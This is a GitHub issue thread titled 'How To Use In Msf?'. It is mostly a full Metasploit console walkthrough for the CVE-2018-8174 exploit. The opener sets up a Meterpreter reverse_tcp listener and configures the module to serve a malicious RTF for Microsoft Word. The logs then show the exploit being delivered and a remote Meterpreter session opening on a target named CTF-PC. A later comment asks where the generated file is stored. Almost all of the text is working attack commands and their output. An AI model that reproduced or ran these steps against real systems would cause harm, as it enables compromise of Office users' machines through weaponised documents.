How To Use In Msf?
jas502n opened this issue · 1 comments
jas502n commented
0x01 Download CVE-2018-8174 To Kali Linux
root@kali:~# updatedb
root@kali:~# locate CVE-2018-8174.rb
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/fileformat/CVE-2018-8174.rb
root@kali:~# locate CVE-2018-8174.rtf
/opt/metasploit-framework/embedded/framework/data/exploits/CVE-2018-8174.rtf
0x02 listent port
root@kali:~# msfconsole
find: unknown predicate `-y'
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v4.16.50-dev- ]
+ -- --=[ 1752 exploits - 1003 auxiliary - 304 post ]
+ -- --=[ 536 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/ha
use exploit/multi/hams/steamed use exploit/multi/handler
msf > use exploit/multi/ha
use exploit/multi/hams/steamed use exploit/multi/handler
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > set lhost 10.10.10.103
lhost => 10.10.10.103
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.10.103 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.10.10.103:4444
msf exploit(multi/handler) > netstat -ntpl
[*] exec: netstat -ntpl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 726/postgres
tcp 0 0 10.10.10.103:4444 0.0.0.0:* LISTEN 18651/ruby
tcp 0 0 0.0.0.0:3391 0.0.0.0:* LISTEN 697/sshd
tcp6 0 0 :::80 :::* LISTEN 422/apache2
tcp6 0 0 ::1:3350 :::* LISTEN 699/xrdp-sesman
tcp6 0 0 ::1:5432 :::* LISTEN 726/postgres
tcp6 0 0 :::3389 :::* LISTEN 747/xrdp
tcp6 0 0 :::3391 :::* LISTEN 697/sshd
0x03 use CVE-2018-8174-msf
msf exploit(multi/handler) > use exploit/windows/fileformat/CVE-2018-8174
msf exploit(windows/fileformat/CVE-2018-8174) > show options
Module options (exploit/windows/fileformat/CVE-2018-8174):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes The file name.
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / yes The URI path to use
Exploit target:
Id Name
-- ----
0 Microsoft Office Word 32-bit
msf exploit(windows/fileformat/CVE-2018-8174) > set srvhost 10.10.10.103
srvhost => 10.10.10.103
msf exploit(windows/fileformat/CVE-2018-8174) > set uri
set urihost set uripath set uriport
msf exploit(windows/fileformat/CVE-2018-8174) > set urip
set uripath set uriport
msf exploit(windows/fileformat/CVE-2018-8174) > set uripath /exploit
uripath => /exploit
msf exploit(windows/fileformat/CVE-2018-8174) > show options
Module options (exploit/windows/fileformat/CVE-2018-8174):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes The file name.
SRVHOST 10.10.10.103 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /exploit yes The URI path to use
Exploit target:
Id Name
-- ----
0 Microsoft Office Word 32-bit
msf exploit(windows/fileformat/CVE-2018-8174) > run
[*] Exploit running as background job 1.
msf exploit(windows/fileformat/CVE-2018-8174) >
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
[*] Using URL: http://10.10.10.103:8080/exploit
[*] Server started.
[*] 10.10.10.106 CVE-2018-8174 - Delivering Exploit
[*] Sending stage (179779 bytes) to 10.10.10.106
[*] Meterpreter session 1 opened (10.10.10.103:4444 -> 10.10.10.106:49318) at 2018-06-21 22:00:09 -0400
msf exploit(windows/fileformat/CVE-2018-8174) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows CTF-PC\shaoyu @ CTF-PC 10.10.10.103:4444 -> 10.10.10.106:49318 (10.10.10.106)
msf exploit(windows/fileformat/CVE-2018-8174) >
qwert123677 commented
Hi! I need help!
For example I've created a exploit called ms14_017.rtf and Metasploit should created a file /root/msf4/local/msf.rtf
How can I access to it like move it to desktop ?????